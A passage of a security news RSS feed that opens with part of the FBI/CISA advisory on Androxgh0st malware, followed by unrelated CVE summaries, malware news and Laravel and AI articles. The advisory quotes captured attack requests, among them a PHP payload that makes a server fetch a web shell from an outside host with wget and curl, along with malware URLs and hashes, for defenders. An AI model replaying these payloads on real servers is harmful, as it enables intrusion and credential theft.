</ul><h5><strong>An example of attempted credential exfiltration through (honeypot) open proxies:</strong></h5>
<p><code>POST /.aws/credentials HTTP/1.1<br>
host: www.example.com<br>
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36<br>
accept-encoding: gzip, deflate<br>
accept: */*<br>
connection: keep-alive<br>
content-length: 20<br>
content-type: application/x-www-form-urlencoded</code></p>
<p>0x%5B%5D=androxgh0st</p>
<h5><strong>An example of attempted web-shell drop through (honeypot) open proxies:</strong></h5>
<p><code>GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1<br>
host: www.example.com<br>
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76<br>
accept-encoding: gzip, deflate<br>
accept: */*<br>
connection: keep-alive<br>
x-forwarded-for: 200.172.238.135<br>
content-length: 279</code></p>
<p><?php file_put_contents('evil.php',file_get_contents('hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt')); system('wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php'); ?></p>
<h5><strong>Monikers used instead of Androxgh0st (0x%5B%5D=???):</strong></h5>
<ul><li>Ridho</li>
<li>Aws</li>
<li>0x_0x</li>
<li>x_X</li>
<li>nopebee7</li>
<li>SMTPEX</li>
<li>evileyes0</li>
<li>privangga</li>
<li>drcrypter</li>
<li>errorcool</li>
<li>drosteam</li>
<li>androxmen</li>
<li>crack3rz</li>
<li>b4bbyghost</li>
<li>0x0day</li>
<li>janc0xsec</li>
<li>blackb0x</li>
<li>0x1331day</li>
<li>Graber</li>
</ul><h5><strong>Example malware drops through eval-stdin.php:</strong></h5>
<p><code>hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt<br>
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4</code></p>
<p>hxxps://chainventures.co[.]uk/.well-known/aas<br>
dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6</p>
<p>hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64<br>
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066</p>
<p>hxxps://pastebin[.]com/raw/zw0gAmpC<br>
ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72</p>
<p>hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php<br>
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef</p>
<p>hxxp://45.95.147[.]236/tmp.x86_64<br>
6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc</p>
<p>hxxp://main.dsn[.]ovh/dns/pwer<br>
bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7</p>
<p>hxxp://tangible-drink.surge[.]sh/configx.txt<br>
de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba</p>
<h3><strong>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</strong></h3>
<p>See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.</p>
<table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 1: Reconnaissance</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th scope="col" role="columnheader"><strong>ID</strong></th>
<th scope="col" role="columnheader"><strong>Use</strong></th>
</tr></thead><tbody><tr><td>
<p>Active Scanning: Vulnerability Scanning</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a></p>
</td>
<td>
<p>The threat actor scans websites for specific vulnerabilities to exploit.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 2: Resource Development</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th scope="col" role="columnheader"><strong>ID</strong></th>
<th scope="col" role="columnheader"><strong>Use</strong></th>
</tr></thead><tbody><tr><td>
<p>Acquire Infrastructure: Botnet</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.005</a></p>
</td>
<td>
<p>The threat actor establishes a botnet to identify and exploit victims.</p>
</td>
</tr><tr><td>
<p>Acquire Infrastructure: Web Services</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1583/006/" title="Acquire Infrastructure: Web Services">T1583.006</a></p>
</td>
<td>
<p>The threat actor creates new AWS instances to use for scanning.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 3: Initial Access</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th scope="col" role="columnheader"><strong>ID</strong></th>
<th scope="col" role="columnheader"><strong>Use</strong></th>
</tr></thead><tbody><tr><td>
<p>Exploit Public-Facing Application</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></p>
</td>
<td>
<p>The threat actor exploits <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841">CVE-2017-9841</a> to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 4: Execution</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th scope="col" role="columnheader"><strong>ID</strong></th>
<th scope="col" role="columnheader"><strong>Use</strong></th>
</tr></thead><tbody><tr><td>
<p>Command and Scripting Interpreter: Python</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1059/006/" title="Command and Scripting Interpreter: Python">T1059.006</a></p>
</td>
<td>
<p>The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 5: Persistence</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th scope="col" role="columnheader"><strong>ID</strong></th>
<th scope="col" role="columnheader"><strong>Use</strong></th>
</tr></thead><tbody><tr><td>
<p>Valid Accounts</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></p>
</td>
<td>
<p>The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.</p>
</td>
</tr><tr><td>
<p>Server Software Component: Web Shell</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a></p>
</td>
<td>
<p>The threat actor deploys web shells to maintain persistent access to systems.</p>
</td>
</tr><tr><td>
<p>Create Account</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1136/" title="Create Account">T1136</a></p>
</td>
<td>
<p>The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 6: Defense Evasion</em></caption>
<thead><tr><td><strong>Technique Title</strong></td>
<td><strong>ID</strong></td>
<td><strong>Use</strong></td>
</tr></thead><tbody><tr><td>
<p>Obfuscated Files or Information: Command Obfuscation</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1027/010/" title="Obfuscated Files or Information: Command Obfuscation">T1027.010</a></p>
</td>
<td>
<p>The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 7: Credential Access</em></caption>
<thead><tr><td><strong>Technique Title</strong></td>
<td><strong>ID</strong></td>
<td><strong>Use</strong></td>
</tr></thead><tbody><tr><td>
<p>Credential Access</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/tactics/TA0006/" title="Credential Access">TA0006</a></p>
</td>
<td>
<p>The threat actor can access the application key of the Laravel application on the site.</p>
</td>
</tr><tr><td>
<p>Unsecured Credentials: Credentials in Files</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials in Files">T1552.001</a></p>
</td>
<td>
<p>The threat actor targets .env files that contain confidential credential information.</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 8: Discovery</em></caption>
<thead><tr><td><strong>Technique Title</strong></td>
<td><strong>ID</strong></td>
<td><strong>Use</strong></td>
</tr></thead><tbody><tr><td>
<p>File and Directory Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1083/" title="File and Directory Discovery">T1083</a></p>
</td>
<td>
<p>The threat actor can identify URLs for files outside root directory through a path traversal attack.</p>
</td>
</tr><tr><td>
<p>Network Service Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a></p>
</td>
<td>
<p>The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 9: Collection</em></caption>
<thead><tr><td><strong>Technique Title</strong></td>
<td><strong>ID</strong></td>
<td><strong>Use</strong></td>
</tr></thead><tbody><tr><td>
<p>Email Collection</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1114/" title="Email Collection">T1114</a></p>
</td>
<td>
<p>The threat actor interacts with application programming interfaces (APIs) to gather information.</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 10: Command and Control</em></caption>
<thead><tr><td><strong>Technique Title</strong></td>
<td><strong>ID</strong></td>
<td><strong>Use</strong></td>
</tr></thead><tbody><tr><td>
<p>Ingress Tool Transfer</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></p>
</td>
<td>
<p>The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.</p>
</td>
</tr></tbody></table><h3><strong>MITIGATIONS</strong></h3>
<p>The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<p>These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" target="_blank" title="Secure by Design">Secure by Design</a> webpage.</p>
<p>The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.</p>
<ul><li><strong>Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems.</li>
<li><strong>Verify that the default configuration for all URIs is to deny all requests</strong> unless there is a specific need for it to be accessible.</li>
<li><strong>Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from </strong><strong><code>.env</code> files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.</strong></li>
<li><strong>On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the </strong><code><strong>.env</strong></code><strong> file for unauthorized access or use.</strong></li>
<li><strong>Scan the server’s file system for unrecognized PHP files</strong>, particularly in the root directory or <code>/vendor/phpunit/phpunit/src/Util/PHP</code> folder.</li>
<li><strong>Review outgoing GET requests (via cURL command) to file hosting sites</strong> such as GitHub, pastebin, etc., particularly when the request accesses a <code>.php</code> file.</li>
</ul><h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
<p>In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol><li>Select an ATT&amp;CK technique described in this advisory (see Tables 1-10).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol><p>FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3><strong>REPORTING</strong></h3>
<p>The FBI encourages organizations to report information concerning suspicious or criminal activity to their <a href="https://www.fbi.gov/contact-us/field-offices/" title="Field Offices">local FBI field office</a>. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.</p>
<p>When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, or to CISA via its <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center at <a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or (888) 282-0870.</p>
<h3><strong>RESOURCES</strong></h3>
<ul><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">CISA: Known Exploited Vulnerabilities Catalog</a></li>
<li><a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">CISA, MITRE: Best Practices for MITRE ATT&amp;CK Mapping</a></li>
<li><a href="https://github.com/cisagov/Decider/" title="cisagov / decider">CISA: Decider Tool</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" title="CVE-2017-9841">NIST: CVE-2017-9841</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" title="CVE-2018-15133">NIST: CVE-2018-15133</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41773" title="CVE-2021-41773">NIST: CVE-2021-41773</a></li>
<li><a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CISA: Cross-Sector Cybersecurity Performance Goals</a></li>
<li><a href="https://www.cisa.gov/securebydesign" target="_blank" title="Secure by Design">CISA: Secure by Design</a></li>
</ul><h3><strong>REFERENCES</strong></h3>
<ol><li><a href="https://fortiguard.fortinet.com/threat-signal-report/5066/androxgh0st-malware-actively-used-in-the-wild" title="AndroxGh0st Malware Actively Used in the Wild">Fortinet - FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild</a></li>
</ol><h3><strong>ACKNOWLEDGEMENTS</strong></h3>
<p>Amazon contributed to this CSA.</p>
<h3><strong>DISCLAIMER</strong></h3>
<p>The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.</p>
<h3><strong>VERSION HISTORY</strong></h3>
<p>January 16, 2024: Initial version.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-48217]]></title>
<description><![CDATA[Statamic is a flat-first, Laravel + Git powered CMS designed for building websites. In affected versions certain additional PHP files crafted to look like images may be uploaded regardless of mime type validation rules. This affects front-end forms using the "Forms" feature, and asset upload fiel...]]></description>
<link>https://tsecurity.de/de/1928109/sicherheitsluecken/cve-2023-48217/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1928109/sicherheitsluecken/cve-2023-48217/</guid>
<pubDate>Wed, 15 Nov 2023 00:25:15 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Statamic is a flat-first, Laravel + Git powered CMS designed for building websites. In affected versions certain additional PHP files crafted to look like images may be uploaded regardless of mime type validation rules. This affects front-end forms using the "Forms" feature, and asset upload fields in the control panel. Malicious users could leverage this vulnerability to upload and execute code. This issue has been patched in versions 3.4.14 and 4.34.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. (CVSS:8.8) (Last Update:2023-11-14 22:15:32)]]></content:encoded>
</item>
<item>
<title><![CDATA[Credential harvesting tool Legion targets additional cloud services]]></title>
<description><![CDATA[A commercial malware tool called Legion that hackers deploy on compromised web servers has recently been updated to extract credentials for additional cloud services to authenticate over SSH. The main goal of this Python-based script is to harvest credentials stored in configuration files for ema...]]></description>
<link>https://tsecurity.de/de/1891024/it-security-nachrichten/credential-harvesting-tool-legion-targets-additional-cloud-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1891024/it-security-nachrichten/credential-harvesting-tool-legion-targets-additional-cloud-services/</guid>
<pubDate>Wed, 24 May 2023 13:20:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article><section class="page"><p>A commercial malware tool called Legion that hackers deploy on compromised web servers has recently been updated to extract credentials for additional cloud services to authenticate over SSH. The main goal of this Python-based script is to harvest credentials stored in configuration files for email providers, cloud service providers, server management systems, databases, and payment systems. These hijacked resources enable the attackers to launch email and SMS spam campaigns.</p><p>"This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," researchers from cloud forensics and incident response firm Cado Security said in <a href="https://cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/" rel="nofollow noopener" target="_blank">a new report</a>. "It’s clear that the developer’s targeting of cloud services is advancing with each iteration."</p><p class="jumpTag"><a href="https://www.csoonline.com/article/3697135/credential-harvesting-tool-legion-targets-additional-cloud-services.html#jump">To read this article in full, please click here</a></p></section></article>]]></content:encoded>
</item>
<item>
<title><![CDATA[Legion Malware Upgraded to Target SSH Servers and AWS Credentials]]></title>
<description><![CDATA[An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
"This recent update demonstrates a widening of scope, with new capabilities such the ability to compr...]]></description>
<link>https://tsecurity.de/de/1890947/it-security-nachrichten/legion-malware-upgraded-to-target-ssh-servers-and-aws-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1890947/it-security-nachrichten/legion-malware-upgraded-to-target-ssh-servers-and-aws-credentials/</guid>
<pubDate>Wed, 24 May 2023 12:34:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
"This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications,"]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40482]]></title>
<description><![CDATA[The authentication method in Laravel 8.x through 9.x before 9.32.0 was discovered to be vulnerable to user enumeration via timeless timing attacks with HTTP/2 multiplexing. This is caused by the early return inside the hasValidCredentials method in the Illuminate\Auth\SessionGuard class when a us...]]></description>
<link>https://tsecurity.de/de/1880358/sicherheitsluecken/cve-2022-40482/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1880358/sicherheitsluecken/cve-2022-40482/</guid>
<pubDate>Tue, 25 Apr 2023 22:22:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The authentication method in Laravel 8.x through 9.x before 9.32.0 was discovered to be vulnerable to user enumeration via timeless timing attacks with HTTP/2 multiplexing. This is caused by the early return inside the hasValidCredentials method in the Illuminate\Auth\SessionGuard class when a user is found to not exist.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-28254]]></title>
<description><![CDATA[A deserialization vulnerability in the destruct() function of Laravel v8.5.9 allows attackers to execute arbitrary commands.]]></description>
<link>https://tsecurity.de/de/1871226/sicherheitsluecken/cve-2021-28254/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1871226/sicherheitsluecken/cve-2021-28254/</guid>
<pubDate>Wed, 19 Apr 2023 07:37:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A deserialization vulnerability in the destruct() function of Laravel v8.5.9 allows attackers to execute arbitrary commands.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Use ChatGPT-4 in Laravel Application]]></title>
<description><![CDATA[Want to integrate ChatGPT-4 into your Laravel application? This step-by-step article will show you how to do it quickly and easily.
The post How to Use ChatGPT-4 in Laravel Application appeared first on LinuxAndUbuntu.]]></description>
<link>https://tsecurity.de/de/1870706/linux-tipps/how-to-use-chatgpt-4-in-laravel-application/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1870706/linux-tipps/how-to-use-chatgpt-4-in-laravel-application/</guid>
<pubDate>Tue, 18 Apr 2023 20:30:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Want to integrate ChatGPT-4 into your Laravel application? This step-by-step article will show you how to do it quickly and easily.</p>
<p>The post <a rel="nofollow" href="https://www.linuxandubuntu.com/home/use-chatgpt-4-in-laravel">How to Use ChatGPT-4 in Laravel Application</a> appeared first on <a rel="nofollow" href="https://www.linuxandubuntu.com/">LinuxAndUbuntu</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrate Laravel Application: Tips and Best Practices]]></title>
<description><![CDATA[Migrate Laravel application from one server to another can be daunting, but it doesn’t have to be. With the right tools and knowledge, it can be a straightforward process. In this tutorial, we’ll guide you through the entire process step by step, covering everything from preparing your new server...]]></description>
<link>https://tsecurity.de/de/1870703/linux-tipps/migrate-laravel-application-tips-and-best-practices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1870703/linux-tipps/migrate-laravel-application-tips-and-best-practices/</guid>
<pubDate>Tue, 18 Apr 2023 20:30:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Migrate Laravel application from one server to another can be daunting, but it doesn’t have to be. With the right tools and knowledge, it can be a straightforward process. In this tutorial, we’ll guide you through the entire process step by step, covering everything from preparing your new server to transferring your application files and updating your configuration files. Prerequisites Before you begin, you’ll need to prepare your new server for hosting Laravel application. After you have installed composer, it is time to start the process. Mainly we need to perform two tasks perfectly for a successful migration. First, bakup…</p>
<p>The post <a rel="nofollow" href="https://www.linuxandubuntu.com/home/migrate-laravel-application-to-new-server">Migrate Laravel Application: Tips and Best Practices</a> appeared first on <a rel="nofollow" href="https://www.linuxandubuntu.com/">LinuxAndUbuntu</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How We Won Our First Government AI Project]]></title>
<description><![CDATA[The Story of Delivering Canada’s Precursor Engagement to the Canadian AI Supplier ListPhoto by Tetyana Kovyrina on pexels.com. Also, a nice view from the Alexandra Bridge when I go cycling.Table of ContentsOverviewKeeping Laws and Regulations Up To DateDefining a New Procurement ProcessThe AI Eng...]]></description>
<link>https://tsecurity.de/de/1866494/ai-nachrichten/how-we-won-our-first-government-ai-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1866494/ai-nachrichten/how-we-won-our-first-government-ai-project/</guid>
<pubDate>Fri, 14 Apr 2023 21:49:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>The Story of Delivering Canada’s Precursor Engagement to the Canadian AI Supplier List</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kZByYT7jkIqpPas_cat86A.jpeg"><figcaption>Photo by <a href="https://www.pexels.com/photo/photo-of-beige-and-green-castle-1045915/">Tetyana Kovyrina</a> on pexels.com. Also, a nice view from the <a href="https://goo.gl/maps/etXAjFNn4JGyHfKf9">Alexandra Bridge</a> when I go cycling.</figcaption></figure><h3><strong>Table of Contents</strong></h3><ul><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#4ab2">Overview</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#f0c7">Keeping Laws and Regulations Up To Date</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#8e9d">Defining a New Procurement Process</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#415f">The AI Engine</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#828c">Navigating the Regulatory Stock</a></li></ul><h3>Overview</h3><p>Back in early 2018, we participated in the Canadian Federal Government’s innovative procurement vehicle with a simple goal: to find innovations that will help to modernize all acts and regulations. There were many objectives to this new innovation purchasing vehicle:</p><ul><li>Identify outdated, burdensome, or simply non-applicable laws;</li><li>Compare the laws to other countries and regions around the world to see how domain-specific regulations are applied, such as the health or energy sectors;</li><li>Retrieve third-party references inside the stock of regulations.</li></ul><p>Lucky for us, we won the bid to help modernize Canadian regulations through the use of a custom NLP platform. However, everything that happened leading up to this project ended up affecting the project in some way.</p><p>This is a story of government procurement, AI adoption, and using technology to solve real-world problems.</p><h3>Keeping Laws and Regulations Up To Date</h3><p>Every government has a requirement to ensure that laws are not only equitable to all citizens but also applicable. Philosophers for centuries have argued and debated about the relationship of the individual in a society, and the concept of fairness and equality is generally a main driving force in democratic populations.</p><p>As we’ve seen with government polarization, laws can become really slow to get adopted. Usually, elected officials pass a law to assign a set of responsibilities to an agency or to a department. This responsible body can update the regulations as they see fit for the duration of its mandate.</p><p>No laws are set in stone, but they are assumed to be fairly fixed. With technology, however, innovation typically moves beyond the speed of standard legal processes. Should a government only intervene when technology starts hurting its population? Or should there be a system to react faster to social issues?</p><p>An important tool used by all levels of regulations to remain dynamic is <strong>incorporating a technical reference within a regulation</strong>. This incorporation allows for regulation to stay relevant by deferring to an external source of information, thereby having the power to update a regulation by pointing to a more modern standard.</p><h4>The Mechanics of Incorporating a Document in a Regulation</h4><p>The simple obligation transitivity looks like this:</p><ul><li>an Act will say, ‘follow the Regulation’ and authorize a responsible body (such as a department) to manage and update said Regulation;</li><li>that Regulation will say, ‘apply the Standard’;</li><li>the Standard will then contain all of the prescriptive activities required for the citizens and organizations.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/805/1*0PeguYKsMNsYDFvYCtYhHQ.png"><figcaption>The relationship between laws, regulations, and technical references. Image by author.</figcaption></figure><h4>Incorporations by Reference: a Double-Edged Sword</h4><p>How can regulators specialize and design laws and regulations in every industrial and technological sector? The simple answer is: they can’t. Technical details change too quickly for experts to list all obligations that participants should follow. And so, with the increased availability of quality work from various Standards Definitions Organizations (SDOs) such as the <a href="https://www.iso.org/">International Standards Organization (ISO)</a>, the inclusion of those expert guidelines as a means to reduce the review time and make laws relevant and applicable makes sense.</p><p>The flip side of this process, however, is a fairly nasty one: <strong>the deferral of expertise to external agents may constitute an illegal abdication of democracy. </strong>Simply, non-elected officials are prescribing directives within regulations.</p><p>How does a democracy then maintain agency over its laws if the responsibility of technical oversight is pushed to SDOs? By reviewing, updating, and managing which standards are to be included during every regulatory review.</p><p>What quickly happens, however, is that too many references start appearing in these regulations, and the cognitive burden of reviewing a regulation to find the scattering of references shoots up to thousands of hours per review.</p><p>In fact, the true motivation for this project was the cost of the manual effort. All of these complexities put together meant a tremendous amount of human effort to review and update these regulations. The KPIs that were shared with us: <strong>1,500 person-hours are required for every single review</strong>.</p><p><em>Interested in playing at home? Try to find all 